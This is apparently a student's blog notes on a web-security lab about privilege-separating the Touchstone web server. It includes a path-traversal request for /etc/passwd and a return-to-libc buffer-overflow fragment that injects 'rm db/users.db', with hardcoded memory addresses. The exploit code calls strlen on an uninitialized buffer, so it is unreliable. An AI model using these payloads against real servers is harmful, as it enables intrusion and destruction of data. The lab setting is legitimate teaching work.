# Lab3 Privilege Separation

719人阅读 评论(1)

## Lab Overview

In this lab, you’ll explore privilege separation. The key insight of privilege separation is to give minimal privilege to each component of a system, so that when one component of the system is comprised, other components will not be comprised too.
To make the discussion concrete, you will do this lab for the Touchstone web server, that is, you will privilege-separate the Touchstone web server by giving each component appropriate privilege. To be specific, you will first examine possible bugs in the source code of the Touchstone web server, and comprise the Touchstone web server by designing and performing exploitations. Finally, you will break up the application into privilege-separated components to minimize the effects of possible vulnerabilities.

This lab consists of three parts:
Part A: you will examine the architecture of the Touchstone web server. The Touchstone web server in this lab differs dramatically from those from lab 1 and 2, the current one is based on the idea of services;
Part B: you will explore jail, by which you can constraint the service in some fake root directory;
Part C: you will privilege-separate the Touchstone web server by assigning each component appropriate privilege.


Exercise 1

\$ sudo /etc/init.d/apache2 stop


Exercise 2

Exercise 3

 char *req ="GET /../../../../../etc/passwd HTTP/1.1\r\n\r\n";


Exercise 4

 chroot("/jail");


Exercise 5

int main()
{
...
char *shellcode = "rm db/users.db";
char req[1080];
int i = 0;
memset(req,'a',strlen(req));
for(;i < strlen(shellcode);i ++)
req[i] = shellcode[i];
req[i] = '\0';
req[2] = 9;
*((int *)&req[1064]) = 0xb7fcee10;    //system
*((int *)&req[1072]) = 0xbfffeeb4;    //&s
req[1076] = '\r';
req[1077] = '\n';
req[1078] = '\r';
req[1079] = '\n';
...
}

Exercise 6

seteuid(1000);

Exercise 7

Challenge

Resource

1
0

* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
个人资料
• 访问：33899次
• 积分：646
• 等级：
• 排名：千里之外
• 原创：36篇
• 转载：1篇
• 译文：0篇
• 评论：9条
文章分类
阅读排行
最新评论